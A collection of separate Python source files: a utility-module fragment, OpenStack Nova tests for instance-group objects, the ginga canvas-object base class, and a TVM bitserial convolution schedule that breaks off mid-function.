"""Iunzip is the same as zip(*iter) but returns iterators, instead of
expand the iterator. Mostly used for large sequence"""
_tmp, iterable = itertools.tee(iterable, 2)
iters = itertools.tee(iterable, internal_length)
return (map(operator.itemgetter(i), it) for i, it in enumerate(iters))
def Enumerator(start=0, initial=()):
try : # py 2
return collections.defaultdict(itertools.count(start).next, initial)
except AttributeError : # py 3
return collections.defaultdict(itertools.count(start).__next__, initial)
class TempShelve(collections_abc.MutableMapping):
def __init__(self, filename):
self.path = tempfile.mkdtemp()
self.shelve = shelve.open(self.path + filename, 'n',
protocol=pickle.HIGHEST_PROTOCOL)
def close(self):
self.shelve.close()
shutil.rmtree(self.path)
def __getitem__(self, key):
key = shelve_key(key)
return self.shelve[key]
def __setitem__(self, key, value):
self.shelve[shelve_key(key)] = value
def __delitem__(self, key):
del self.shelve[shelve_key(key)]
def __iter__(self):
return iter(self.shelve)
def __len__(self):
return len(self.shelve)
def __contains__(self, key):
return shelve_key(key) in self.shelve
def values(self):
return viewvalues(self.shelve)
def sniff_id_type(ids):
example = ids[0][0]
python_type = type(example)
if python_type is binary_type or python_type is text_type :
python_type = (unicode, 256)
else:
int_type(example) # make sure we can cast to int
python_type = int_type
return python_type
| |
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from nova.compute import flavors
from nova import context
from nova import db
from nova import exception
from nova.objects import instance_group
from nova import test
from nova.tests.objects import test_objects
from nova.tests import utils as tests_utils
class _TestInstanceGroupObjects(test.TestCase):
def setUp(self):
super(_TestInstanceGroupObjects, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
def _get_default_values(self):
return {'name': 'fake_name',
'user_id': self.user_id,
'project_id': self.project_id}
def _create_instance_group(self, context, values, policies=None,
members=None):
return db.instance_group_create(context, values, policies=policies,
members=members)
def test_get_by_uuid(self):
values = self._get_default_values()
policies = ['policy1', 'policy2']
members = ['instance_id1', 'instance_id2']
db_result = self._create_instance_group(self.context, values,
policies=policies,
members=members)
obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
db_result.uuid)
self.assertEqual(obj_result.members, members)
self.assertEqual(obj_result.policies, policies)
def test_refresh(self):
values = self._get_default_values()
db_result = self._create_instance_group(self.context, values)
obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
db_result.uuid)
self.assertEqual(obj_result.name, 'fake_name')
values = {'name': 'new_name', 'user_id': 'new_user',
'project_id': 'new_project'}
db.instance_group_update(self.context, db_result['uuid'],
values)
obj_result.refresh()
self.assertEqual(obj_result.name, 'new_name')
self.assertEqual(set([]), obj_result.obj_what_changed())
def test_save_simple(self):
values = self._get_default_values()
db_result = self._create_instance_group(self.context, values)
obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
db_result.uuid)
self.assertEqual(obj_result.name, 'fake_name')
obj_result.name = 'new_name'
obj_result.save()
result = db.instance_group_get(self.context, db_result['uuid'])
self.assertEqual(result['name'], 'new_name')
def test_save_policies(self):
values = self._get_default_values()
db_result = self._create_instance_group(self.context, values)
obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
db_result.uuid)
policies = ['policy1', 'policy2']
obj_result.policies = policies
obj_result.save()
result = db.instance_group_get(self.context, db_result['uuid'])
self.assertEqual(result['policies'], policies)
def test_save_members(self):
values = self._get_default_values()
db_result = self._create_instance_group(self.context, values)
obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
db_result.uuid)
members = ['instance1', 'instance2']
obj_result.members = members
obj_result.save()
result = db.instance_group_get(self.context, db_result['uuid'])
self.assertEqual(result['members'], members)
def test_create(self):
group1 = instance_group.InstanceGroup()
group1.uuid = 'fake-uuid'
group1.name = 'fake-name'
group1.create(self.context)
group2 = instance_group.InstanceGroup.get_by_uuid(self.context,
group1.uuid)
self.assertEqual(group1.id, group2.id)
self.assertEqual(group1.uuid, group2.uuid)
self.assertEqual(group1.name, group2.name)
result = db.instance_group_get(self.context, group1.uuid)
self.assertEqual(group1.id, result.id)
self.assertEqual(group1.uuid, result.uuid)
self.assertEqual(group1.name, result.name)
def test_create_with_policies(self):
group1 = instance_group.InstanceGroup()
group1.policies = ['policy1', 'policy2']
group1.create(self.context)
group2 = instance_group.InstanceGroup.get_by_uuid(self.context,
group1.uuid)
self.assertEqual(group1.id, group2.id)
self.assertEqual(group1.policies, group2.policies)
def test_create_with_members(self):
group1 = instance_group.InstanceGroup()
group1.members = ['instance1', 'instance2']
group1.create(self.context)
group2 = instance_group.InstanceGroup.get_by_uuid(self.context,
group1.uuid)
self.assertEqual(group1.id, group2.id)
self.assertEqual(group1.members, group2.members)
def test_recreate_fails(self):
group = instance_group.InstanceGroup()
group.create(self.context)
self.assertRaises(exception.ObjectActionError, group.create,
self.context)
def test_destroy(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
group = instance_group.InstanceGroup()
group.id = result.id
group.uuid = result.uuid
group.destroy(self.context)
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_get, self.context, result['uuid'])
def _populate_instances(self):
instances = [(str(uuid.uuid4()), 'f1', 'p1'),
(str(uuid.uuid4()), 'f2', 'p1'),
(str(uuid.uuid4()), 'f3', 'p2'),
(str(uuid.uuid4()), 'f4', 'p2')]
for instance in instances:
values = self._get_default_values()
values['uuid'] = instance[0]
values['name'] = instance[1]
values['project_id'] = instance[2]
self._create_instance_group(self.context, values)
return instances
def test_list_all(self):
self._populate_instances()
inst_list = instance_group.InstanceGroupList.get_all(self.context)
groups = db.instance_group_get_all(self.context)
self.assertEqual(len(groups), len(inst_list.objects))
self.assertEqual(len(groups), 4)
for i in range(0, len(groups)):
self.assertIsInstance(inst_list.objects[i],
instance_group.InstanceGroup)
self.assertEqual(inst_list.objects[i].uuid, groups[i]['uuid'])
def test_list_by_project_id(self):
self._populate_instances()
project_ids = ['p1', 'p2']
for id in project_ids:
il = instance_group.InstanceGroupList.get_by_project_id(
self.context, id)
groups = db.instance_group_get_all_by_project_id(self.context, id)
self.assertEqual(len(groups), len(il.objects))
self.assertEqual(len(groups), 2)
for i in range(0, len(groups)):
self.assertIsInstance(il.objects[i],
instance_group.InstanceGroup)
self.assertEqual(il.objects[i].uuid, groups[i]['uuid'])
self.assertEqual(il.objects[i].name, groups[i]['name'])
self.assertEqual(il.objects[i].project_id, id)
def test_get_by_name(self):
self._populate_instances()
ctxt = context.RequestContext('fake_user', 'p1')
ig = instance_group.InstanceGroup.get_by_name(ctxt, 'f1')
self.assertEqual('f1', ig.name)
def test_get_by_hint(self):
instances = self._populate_instances()
for instance in instances:
ctxt = context.RequestContext('fake_user', instance[2])
ig = instance_group.InstanceGroup.get_by_hint(ctxt, instance[1])
self.assertEqual(instance[1], ig.name)
ig = instance_group.InstanceGroup.get_by_hint(ctxt, instance[0])
self.assertEqual(instance[0], ig.uuid)
def test_add_members(self):
instance_ids = ['fakeid1', 'fakeid2']
values = self._get_default_values()
group = self._create_instance_group(self.context, values)
members = instance_group.InstanceGroup.add_members(self.context,
group.uuid, instance_ids)
group = instance_group.InstanceGroup.get_by_uuid(self.context,
group.uuid)
for instance in instance_ids:
self.assertIn(instance, members)
self.assertIn(instance, group.members)
def test_get_hosts(self):
instance1 = tests_utils.get_test_instance(self.context,
flavor=flavors.get_default_flavor(), obj=True)
instance1.host = 'hostA'
instance1.save()
instance2 = tests_utils.get_test_instance(self.context,
flavor=flavors.get_default_flavor(), obj=True)
instance2.host = 'hostB'
instance2.save()
instance3 = tests_utils.get_test_instance(self.context,
flavor=flavors.get_default_flavor(), obj=True)
instance3.host = 'hostB'
instance3.save()
instance_ids = [instance1.uuid, instance2.uuid, instance3.uuid]
values = self._get_default_values()
group = self._create_instance_group(self.context, values)
instance_group.InstanceGroup.add_members(self.context, group.uuid,
instance_ids)
group = instance_group.InstanceGroup.get_by_uuid(self.context,
group.uuid)
hosts = group.get_hosts(self.context)
self.assertEqual(2, len(hosts))
self.assertIn('hostA', hosts)
self.assertIn('hostB', hosts)
hosts = group.get_hosts(self.context, exclude=[instance1.uuid])
self.assertEqual(1, len(hosts))
self.assertIn('hostB', hosts)
def test_get_hosts_with_some_none(self):
instance1 = tests_utils.get_test_instance(self.context,
flavor=flavors.get_default_flavor(), obj=True)
instance1.host = None
instance1.save()
instance2 = tests_utils.get_test_instance(self.context,
flavor=flavors.get_default_flavor(), obj=True)
instance2.host = 'hostB'
instance2.save()
instance_ids = [instance1.uuid, instance2.uuid]
values = self._get_default_values()
group = self._create_instance_group(self.context, values)
instance_group.InstanceGroup.add_members(self.context, group.uuid,
instance_ids)
group = instance_group.InstanceGroup.get_by_uuid(self.context,
group.uuid)
hosts = group.get_hosts(self.context)
self.assertEqual(1, len(hosts))
self.assertIn('hostB', hosts)
def test_obj_make_compatible(self):
group = instance_group.InstanceGroup(uuid='fake-uuid',
name='fake-name')
group.create(self.context)
group_primitive = group.obj_to_primitive()
group.obj_make_compatible(group_primitive, '1.6')
self.assertEqual({}, group_primitive['metadetails'])
class TestInstanceGroupObject(test_objects._LocalTest,
_TestInstanceGroupObjects):
pass
class TestRemoteInstanceGroupObject(test_objects._RemoteTest,
_TestInstanceGroupObjects):
pass
| |
#
# CanvasObject.py -- base class for shapes drawn on ginga canvases.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import math
import numpy
from collections import namedtuple
from ginga.misc import Callback, Bunch
from ginga import trcalc, colors
from ginga.util.six.moves import map
from . import coordmap
__all__ = ['CanvasObjectBase', 'get_canvas_type', 'get_canvas_types',
'register_canvas_type', 'register_canvas_types']
colors_plus_none = [ None ] + colors.get_colors()
Point = namedtuple('Point', ['x', 'y'])
class EditPoint(Point):
edit_color = 'yellow'
class MovePoint(EditPoint):
edit_color = 'orangered'
class ScalePoint(EditPoint):
edit_color = 'green'
class RotatePoint(EditPoint):
edit_color = 'skyblue'
class CanvasObjectError(Exception):
pass
class CanvasObjectBase(Callback.Callbacks):
"""This is the abstract base class for a CanvasObject. A CanvasObject
is an item that can be placed on a ImageViewCanvas.
This class defines common methods used by all such objects.
"""
def __init__(self, **kwdargs):
if not hasattr(self, 'cb'):
Callback.Callbacks.__init__(self)
self.cap = 'ball'
self.cap_radius = 4
self.editable = True
self.coord = 'data'
self.ref_obj = None
self.__dict__.update(kwdargs)
self.data = None
self.crdmap = None
self.tag = None
if not hasattr(self, 'kind'):
self.kind = None
# For debugging
self.name = None
self.viewer = None
# For callbacks
for name in ('edited', 'pick-down', 'pick-move', 'pick-up',
'pick-hover', 'pick-enter', 'pick-leave'):
self.enable_callback(name)
def initialize(self, canvas, viewer, logger):
self.viewer = viewer
self.logger = logger
if self.crdmap is None:
if self.coord is None:
# default mapping is to data coordinates
self.coord = 'data'
if self.coord == 'offset':
self.crdmap = coordmap.OffsetMapper(viewer, self.ref_obj)
else:
self.crdmap = viewer.get_coordmap(self.coord)
def sync_state(self):
"""This method called when changes are made to the parameters.
subclasses should override if they need any special state handling.
"""
pass
def set_data(self, **kwdargs):
if self.data is None:
self.data = Bunch.Bunch(kwdargs)
else:
self.data.update(kwdargs)
def get_data(self, *args):
if len(args) == 0:
return self.data
elif len(args) == 1:
return self.data[args[0]]
elif len(args) == 2:
try:
return self.data[args[0]]
except KeyError:
return args[1]
else:
raise CanvasObjectError("method get_data() takes at most 2 arguments")
def use_coordmap(self, mapobj):
self.crdmap = mapobj
def canvascoords(self, viewer, data_x, data_y, center=None):
if center is not None:
self.logger.warn("`center` keyword is ignored and will be deprecated")
return viewer.get_canvas_xy(data_x, data_y)
def is_compound(self):
return False
def contains_arr(self, x_arr, y_arr):
contains = numpy.asarray([False] * len(x_arr))
return contains
def contains(self, x, y):
return False
def select_contains(self, viewer, x, y):
return self.contains(x, y)
def draw_arrowhead(self, cr, x1, y1, x2, y2):
i1, j1, i2, j2 = self.calc_vertexes(x1, y1, x2, y2)
alpha = getattr(self, 'alpha', 1.0)
cr.set_fill(self.color, alpha=alpha)
cr.draw_polygon(((x2, y2), (i1, j1), (i2, j2)))
cr.set_fill(None)
def draw_caps(self, cr, cap, points, radius=None):
i = 0
for pt in points:
cx, cy = pt
if radius is None:
radius = self.cap_radius
alpha = getattr(self, 'alpha', 1.0)
if cap == 'ball':
color = self.color
# Draw edit control points in different colors than the others
if isinstance(pt, EditPoint):
cr.set_fill('black', alpha=alpha)
cr.draw_circle(cx, cy, radius+2.0)
color = pt.edit_color
cr.set_fill(color, alpha=alpha)
cr.draw_circle(cx, cy, radius)
#cr.set_fill(self, None)
i += 1
def draw_edit(self, cr, viewer):
bbox = self.get_bbox()
cpoints = self.get_cpoints(viewer, points=bbox, no_rotate=True)
cr.set_fill(None)
cr.set_line(color='cyan', style='dash')
cr.draw_polygon(cpoints)
points = self.get_edit_points(viewer)
cpoints = self.get_cpoints(viewer, points=points)
# preserve point types for coloring
def _map_cpt(pt, cpt):
if isinstance(pt, EditPoint):
return pt.__class__(*cpt)
return cpt
cpoints = tuple([ _map_cpt(points[i], cpoints[i])
for i in range(len(points)) ])
self.draw_caps(cr, 'ball', cpoints)
def calc_radius(self, viewer, p1, p2):
x1, y1 = p1
x2, y2 = p2
# TODO: the accuracy of this calculation of radius might be improved?
radius = math.sqrt(abs(y2 - y1)**2 + abs(x2 - x1)**2)
return (x1, y1, radius)
def calc_vertexes(self, start_cx, start_cy, end_cx, end_cy,
arrow_length=10, arrow_degrees=0.35):
angle = math.atan2(end_cy - start_cy, end_cx - start_cx) + math.pi
cx1 = end_cx + arrow_length * math.cos(angle - arrow_degrees);
cy1 = end_cy + arrow_length * math.sin(angle - arrow_degrees);
cx2 = end_cx + arrow_length * math.cos(angle + arrow_degrees);
cy2 = end_cy + arrow_length * math.sin(angle + arrow_degrees);
return (cx1, cy1, cx2, cy2)
def swapxy(self, x1, y1, x2, y2):
if x2 < x1:
x1, x2 = x2, x1
if y2 < y1:
y1, y2 = y2, y1
return (x1, y1, x2, y2)
def scale_font(self, viewer):
zoomlevel = viewer.get_zoom()
if zoomlevel >= -4:
return 14
elif zoomlevel >= -6:
return 12
elif zoomlevel >= -8:
return 10
else:
return 8
def get_points(self):
"""Get the set of points that is used to draw the object.
Points are returned in *data* coordinates.
"""
points = list(map(lambda pt: self.crdmap.to_data(pt[0], pt[1]),
self.points))
return points
def get_data_points(self, points=None):
if points is None:
points = self.points
points = list(map(lambda pt: self.crdmap.to_data(pt[0], pt[1]),
points))
return points
def set_data_points(self, points):
points = list(map(lambda pt: self.crdmap.data_to(pt[0], pt[1]),
points))
self.points = points
def rotate(self, theta_deg, xoff=0, yoff=0):
points = numpy.asarray(self.get_data_points(), dtype=numpy.double)
points = trcalc.rotate_coord(points, theta_deg, [xoff, yoff])
self.set_data_points(points)
def rotate_by(self, theta_deg):
ref_x, ref_y = self.get_reference_pt()
self.rotate(theta_deg, xoff=ref_x, yoff=ref_y)
def rerotate_by(self, theta_deg, detail):
ref_x, ref_y = detail.center_pos
points = numpy.asarray(detail.points, dtype=numpy.double)
points = trcalc.rotate_coord(points, theta_deg, [ref_x, ref_y])
self.set_data_points(points)
def move_delta(self, xoff, yoff):
## self.points = list(map(
## lambda pt: self.crdmap.offset_pt(pt, xoff, yoff),
## self.points))
points = numpy.asarray(self.get_data_points(), dtype=numpy.double)
points.T[0] += xoff
points.T[1] += yoff
self.set_data_points(points)
def move_to(self, xdst, ydst):
x, y = self.get_reference_pt()
return self.move_delta(xdst - x, ydst - y)
def get_num_points(self):
return(len(self.points))
def set_point_by_index(self, i, pt):
points = self.get_data_points()
points[i] = pt
self.set_data_points(points)
def get_point_by_index(self, i):
points = self.get_data_points()
return points[i]
def scale_by(self, scale_x, scale_y):
ctr_x, ctr_y = self.get_center_pt()
pts = numpy.asarray(self.get_data_points(), dtype=numpy.double)
pts[:, 0] = (pts[:, 0] - ctr_x) * scale_x + ctr_x
pts[:, 1] = (pts[:, 1] - ctr_y) * scale_y + ctr_y
self.set_data_points(pts)
def rescale_by(self, scale_x, scale_y, detail):
ctr_x, ctr_y = detail.center_pos
pts = numpy.asarray(detail.points, dtype=numpy.double)
pts[:, 0] = (pts[:, 0] - ctr_x) * scale_x + ctr_x
pts[:, 1] = (pts[:, 1] - ctr_y) * scale_y + ctr_y
self.set_data_points(pts)
def setup_edit(self, detail):
"""subclass should override as necessary."""
detail.center_pos = self.get_center_pt()
def calc_rotation_from_pt(self, pt, detail):
x, y = pt
ctr_x, ctr_y = detail.center_pos
start_x, start_y = detail.start_pos
# calc angle of starting point wrt origin
deg1 = math.degrees(math.atan2(start_y - ctr_y,
start_x - ctr_x))
# calc angle of current point wrt origin
deg2 = math.degrees(math.atan2(y - ctr_y, x - ctr_x))
delta_deg = deg2 - deg1
return delta_deg
def calc_scale_from_pt(self, pt, detail):
x, y = pt
ctr_x, ctr_y = detail.center_pos
start_x, start_y = detail.start_pos
dx, dy = start_x - ctr_x, start_y - ctr_y
# calc distance of starting point wrt origin
dist1 = math.sqrt(dx**2.0 + dy**2.0)
dx, dy = x - ctr_x, y - ctr_y
# calc distance of current point wrt origin
dist2 = math.sqrt(dx**2.0 + dy**2.0)
scale_f = dist2 / dist1
return scale_f
def calc_dual_scale_from_pt(self, pt, detail):
x, y = pt
ctr_x, ctr_y = detail.center_pos
start_x, start_y = detail.start_pos
# calc distance of starting point wrt origin
dx, dy = start_x - ctr_x, start_y - ctr_y
# calc distance of current point wrt origin
ex, ey = x - ctr_x, y - ctr_y
scale_x, scale_y = float(ex) / dx, float(ey) / dy
return scale_x, scale_y
def convert_mapper(self, tomap):
"""
Converts our object from using one coordinate map to another.
NOTE: This is currently NOT WORKING, because radii are not
converted correctly.
"""
frommap = self.crdmap
if frommap == tomap:
return
# convert radii
if hasattr(self, 'radius'):
xc, yc = self.get_center_pt()
# get data coordinates of a point radius away from center
# under current coordmap
x1, y1 = frommap.to_data(xc, yc)
x2, y2 = frommap.to_data(xc + self.radius, yc)
x3, y3 = frommap.to_data(xc, yc + self.radius)
# now convert these data coords to native coords in tomap
nx1, ny1 = tomap.data_to(x1, y1)
nx2, ny2 = tomap.data_to(x2, y2)
nx3, ny3 = tomap.data_to(x3, y3)
# recalculate radius using new coords
self.radius = math.sqrt((nx2 - nx1)**2 + (ny3 - ny1)**2)
elif hasattr(self, 'xradius'):
# similar to above case, but there are 2 radii
xc, yc = self.get_center_pt()
x1, y1 = frommap.to_data(xc, yc)
x2, y2 = frommap.to_data(xc + self.xradius, yc)
x3, y3 = frommap.to_data(xc, yc + self.yradius)
nx1, ny1 = tomap.data_to(x1, y1)
nx2, ny2 = tomap.data_to(x2, y2)
nx3, ny3 = tomap.data_to(x3, y3)
self.xradius = math.fabs(nx2 - nx1)
self.yradius = math.fabs(ny3 - ny1)
# convert points
for i in range(self.get_num_points()):
# convert each point by going to data coords under old map
# and then to native coords in the new map
x, y = self.get_point_by_index(i)
data_x, data_y = frommap.to_data(x, y)
new_x, new_y = tomap.data_to(data_x, data_y)
self.set_point_by_index(i, (new_x, new_y))
# set our map to the new map
self.crdmap = tomap
# TODO: move these into utility module?
#####
def point_within_radius(self, a_arr, b_arr, x, y, canvas_radius,
scale_x=1.0, scale_y=1.0):
"""Point (a, b) and point (x, y) are in data coordinates.
Return True if point (a, b) is within the circle defined by
a center at point (x, y) and within canvas_radius.
"""
dx = numpy.fabs(x - a_arr) * scale_x
dy = numpy.fabs(y - b_arr) * scale_y
new_radius = numpy.sqrt(dx**2 + dy**2)
res = (new_radius <= canvas_radius)
return res
def within_radius(self, viewer, a_arr, b_arr, x, y, canvas_radius):
"""Point (a, b) and point (x, y) are in data coordinates.
Return True if point (a, b) is within the circle defined by
a center at point (x, y) and within canvas_radius.
The distance between points is scaled by the canvas scale.
"""
scale_x, scale_y = viewer.get_scale_xy()
return self.point_within_radius(a_arr, b_arr, x, y, canvas_radius,
scale_x=scale_x, scale_y=scale_y)
def get_pt(self, viewer, points, x, y, canvas_radius=None):
if canvas_radius is None:
canvas_radius = self.cap_radius
if hasattr(self, 'rot_deg'):
# rotate point back to cartesian alignment for test
ctr_x, ctr_y = self.get_center_pt()
xp, yp = trcalc.rotate_pt(x, y, -self.rot_deg,
xoff=ctr_x, yoff=ctr_y)
else:
xp, yp = x, y
# TODO: do this using numpy array()
for i in range(len(points)):
a, b = points[i]
if self.within_radius(viewer, xp, yp, a, b, canvas_radius):
return i
return None
def point_within_line(self, a_arr, b_arr, x1, y1, x2, y2,
canvas_radius):
# TODO: is there an algorithm with the cross and dot products
# that is more efficient?
r = canvas_radius
xmin, xmax = min(x1, x2) - r, max(x1, x2) + r
ymin, ymax = min(y1, y2) - r, max(y1, y2) + r
div = numpy.sqrt((x2 - x1)**2 + (y2 - y1)**2)
d = numpy.fabs((x2 - x1)*(y1 - b_arr) - (x1 - a_arr)*(y2 - y1)) / div
## contains = (xmin <= a_arr <= xmax) and (ymin <= b_arr <= ymax) and \
## (d <= canvas_radius)
contains = numpy.logical_and(
numpy.logical_and(xmin <= a_arr, a_arr <= xmax),
numpy.logical_and(d <= canvas_radius,
numpy.logical_and(ymin <= b_arr, b_arr <= ymax)))
return contains
def within_line(self, viewer, a_arr, b_arr, x1, y1, x2, y2,
canvas_radius):
"""Point (a, b) and points (x1, y1), (x2, y2) are in data coordinates.
Return True if point (a, b) is within the line defined by
a line from (x1, y1) to (x2, y2) and within canvas_radius.
The distance between points is scaled by the canvas scale.
"""
scale_x, scale_y = viewer.get_scale_xy()
new_radius = canvas_radius * 1.0 / min(scale_x, scale_y)
return self.point_within_line(a_arr, b_arr, x1, y1, x2, y2,
new_radius)
#####
def get_center_pt(self):
"""Return the geometric average of points as data_points.
"""
P = numpy.asarray(self.get_data_points(), dtype=numpy.double)
x = P[:, 0]
y = P[:, 1]
ctr_x = numpy.sum(x) / float(len(x))
ctr_y = numpy.sum(y) / float(len(y))
return ctr_x, ctr_y
def get_reference_pt(self):
return self.get_center_pt()
def get_move_scale_rotate_pts(self, viewer):
"""Returns 3 edit control points for editing this object: a move
point, a scale point and a rotate point. These points are all in
data coordinates.
"""
scale = viewer.get_scale_min()
ref_x, ref_y = self.get_center_pt()
xl, yl, xu, yu = self.get_llur()
offset = 8.0 / scale
scl_x, scl_y = xl - offset, yl - offset
rot_x, rot_y = xu + offset, yu + offset
if hasattr(self, 'rot_deg'):
# if this is an object with a rotation attribute, pre rotate
# the control points in the opposite direction, because they
# will be rotated back
theta = -self.rot_deg
scl_x, scl_y = trcalc.rotate_pt(scl_x, scl_y, theta,
xoff=ref_x, yoff=ref_y)
rot_x, rot_y = trcalc.rotate_pt(rot_x, rot_y, theta,
xoff=ref_x, yoff=ref_y)
move_pt = MovePoint(ref_x, ref_y)
scale_pt = ScalePoint(scl_x, scl_y)
rotate_pt = RotatePoint(rot_x, rot_y)
return (move_pt, scale_pt, rotate_pt)
def get_cpoints(self, viewer, points=None, no_rotate=False):
if points is None:
points = self.get_points()
points = numpy.asarray(points)
if (not no_rotate) and hasattr(self, 'rot_deg') and self.rot_deg != 0.0:
# rotate vertices according to rotation
ctr_x, ctr_y = self.get_center_pt()
points = trcalc.rotate_coord(points, self.rot_deg, (ctr_x, ctr_y))
cpoints = tuple(map(lambda p: self.canvascoords(viewer, p[0], p[1]),
points))
return cpoints
def get_bbox(self):
"""
Get lower-left and upper-right coordinates of the bounding box
of this compound object.
Returns
-------
x1, y1, x2, y2: a 4-tuple of the lower-left and upper-right coords
"""
x1, y1, x2, y2 = self.get_llur()
return ((x1, y1), (x1, y2), (x2, y2), (x2, y1))
# this is the data structure to which drawing classes are registered
drawCatalog = Bunch.Bunch(caseless=True)
def get_canvas_types():
# force registration of all canvas types
import ginga.canvas.types.all
return drawCatalog
def get_canvas_type(name):
# force registration of all canvas types
import ginga.canvas.types.all
return drawCatalog[name]
def register_canvas_type(name, klass):
global drawCatalog
drawCatalog[name] = klass
def register_canvas_types(klass_dict):
global drawCatalog
drawCatalog.update(klass_dict)
# funky boolean converter
_bool = lambda st: str(st).lower() == 'true'
# color converter
_color = lambda name: name
# END
| |
# pylint: disable=invalid-name,unused-variable,invalid-name
"""Bitserial conv2d schedule on x86"""
import tvm
from topi.util import get_const_int
from .. import generic, tag
from ..nn.bitserial_conv2d import bitserial_conv2d, _get_schedule, _get_workload
from ..nn.bitserial_conv2d import SpatialPackNCHW, SpatialPackNHWC
from ..nn.bitserial_conv2d import _WORKLOADS, _SCH_TO_DECL_FUNC_QUANT
_QUANTIZED_SCHEDULES_NCHW = [
# resnet
SpatialPackNCHW(2, 2, 8, 1, 1),
SpatialPackNCHW(1, 4, 8, 4, 1),
SpatialPackNCHW(1, 4, 8, 1, 16),
SpatialPackNCHW(1, 4, 8, 4, 8),
SpatialPackNCHW(1, 7, 8, 3, 8),
SpatialPackNCHW(1, 2, 8, 1, 8),
SpatialPackNCHW(2, 1, 8, 1, 4),
SpatialPackNCHW(1, 7, 8, 1, 1),
SpatialPackNCHW(1, 1, 8, 1, 16),
SpatialPackNCHW(1, 1, 8, 1, 8),
SpatialPackNCHW(1, 1, 8, 1, 16),
SpatialPackNCHW(3, 3, 16, 3, 16),
SpatialPackNCHW(1, 1, 16, 2, 16),
SpatialPackNCHW(1, 1, 8, 1, 16),
SpatialPackNCHW(1, 1, 8, 1, 16),
]
_QUANTIZED_SCHEDULES_NHWC = [
# resnet
SpatialPackNHWC(2, 2, 8, 1, 1),
SpatialPackNHWC(1, 4, 8, 4, 1),
SpatialPackNHWC(1, 4, 8, 1, 16),
SpatialPackNHWC(1, 4, 8, 4, 8),
SpatialPackNHWC(1, 7, 8, 3, 8),
SpatialPackNHWC(1, 2, 8, 1, 8),
SpatialPackNHWC(2, 1, 8, 1, 4),
SpatialPackNHWC(1, 7, 8, 1, 1),
SpatialPackNHWC(1, 1, 8, 1, 16),
SpatialPackNHWC(1, 1, 8, 1, 8),
SpatialPackNHWC(1, 1, 8, 1, 16),
]
@_get_schedule.register("cpu")
def _get_schedule_bitserial_conv2d(wkl, layout):
if wkl not in _WORKLOADS:
raise ValueError("no schedule for such workload: {}".format(wkl))
idx = _WORKLOADS.index(wkl)
if layout == "NCHW":
sch = _QUANTIZED_SCHEDULES_NCHW[idx]
elif layout == "NHWC":
sch = _QUANTIZED_SCHEDULES_NHWC[idx]
return sch
@bitserial_conv2d.register("cpu")
def _declaration_bitserial_conv2d(data, kernel, stride, padding, activation_bits, weight_bits,
layout='NCHW', pack_dtype=None, out_dtype=None, dorefa=False):
if out_dtype is None:
out_dtype = data.dtype
assert data.shape[0].value == 1, "only support batch size=1 convolution on rasp"
assert layout == "NCHW" or layout == "NHWC", "only support layouts NCHW and NHWC"
wkl = _get_workload(data, kernel, stride, padding, out_dtype, layout)
sch = _get_schedule(wkl, layout)
return _SCH_TO_DECL_FUNC_QUANT[type(sch)](data, kernel, stride, padding, activation_bits,
weight_bits, pack_dtype, out_dtype, dorefa)
@generic.schedule_bitserial_conv2d_nchw.register(["cpu"])
@generic.schedule_bitserial_conv2d_nhwc.register(["cpu"])
def schedule_bitserial_conv2d(outs):
"""CPU schedule for bitserial convolutions NCHW and NHWC"""
s = tvm.create_schedule([x.op for x in outs])
scheduled_ops = []
def traverse(op):
"""Traverse operators from computation graph"""
output = op.output(0)
# inline all one-to-one-mapping operators except the last stage (output)
if tag.is_broadcast(op.tag) or 'elemwise' in op.tag:
if op not in s.outputs:
s[op].compute_inline()
for tensor in op.input_tensors and tensor.op not in scheduled_ops:
if tensor.op.input_tensors:
traverse(tensor.op)
elif 'spatial_bitserial_conv_nchw' in op.tag or 'spatial_bitserial_conv_nhwc' in op.tag:
conv_out = op.input_tensors[0]
kernel_vec = conv_out.op.input_tensors[1]
kernel_q = kernel_vec.op.input_tensors[0]
kernel = kernel_q.op.input_tensors[0]
data_vec = conv_out.op.input_tensors[0]
data_q = data_vec.op.input_tensors[0]
data = data_q.op.input_tensors[0]
data_pad = None
if isinstance(data_q.op, tvm.tensor.ComputeOp) and "pad" in data_q.op.tag:
data_pad = data_q
data_q = data
data = data_q.op.input_tensors[0]
if "QuantizeInput" in kernel.op.name:
# Need to go up 1 further, from the combine in bitpack
kernel = kernel.op.input_tensors[0]
if "QuantizeInput" in data.op.name:
# Need to go up 1 further, from the combine in bitpack
data = data.op.input_tensors[0]
if 'spatial_bitserial_conv_nchw' in op.tag:
_schedule_spatial_conv2d_nchw(s, data, data_q, data_pad, data_vec,
kernel, kernel_q, kernel_vec,
conv_out, output, outs[0])
elif 'spatial_bitserial_conv_nhwc' in op.tag:
_schedule_spatial_conv2d_nhwc(s, data, data_q, data_pad, data_vec,
kernel, kernel_q, kernel_vec,
conv_out, output, outs[0])
scheduled_ops.append(op)
traverse(outs[0].op)
return s
def _schedule_spatial_conv2d_nchw(s, data, data_q, data_pad, data_vec,
kernel, kernel_q, kernel_vec,
conv_out, output, last):
IB, _, CI, IH, IW = data_q.shape
KB, CO, _, KH, KW = kernel_q.shape
_, _, OH, OW = output.shape
# Infer padding and stride
if data_pad is None:
padding = (0, 0)
TH, TW = IH, IW
else:
_, _, _, TH, TW = data_pad.shape
hpad = get_const_int((TH - IH) // 2)
wpad = get_const_int((TW - IW) // 2)
padding = (hpad, wpad)
hstride = get_const_int((TH - KH) // (OH - 1))
wstride = get_const_int((TW - KW) // (OW - 1))
stride = (hstride, wstride)
wkl = _get_workload(data, kernel, stride, padding, output.dtype, "NCHW")
sch = _get_schedule(wkl, "NCHW")
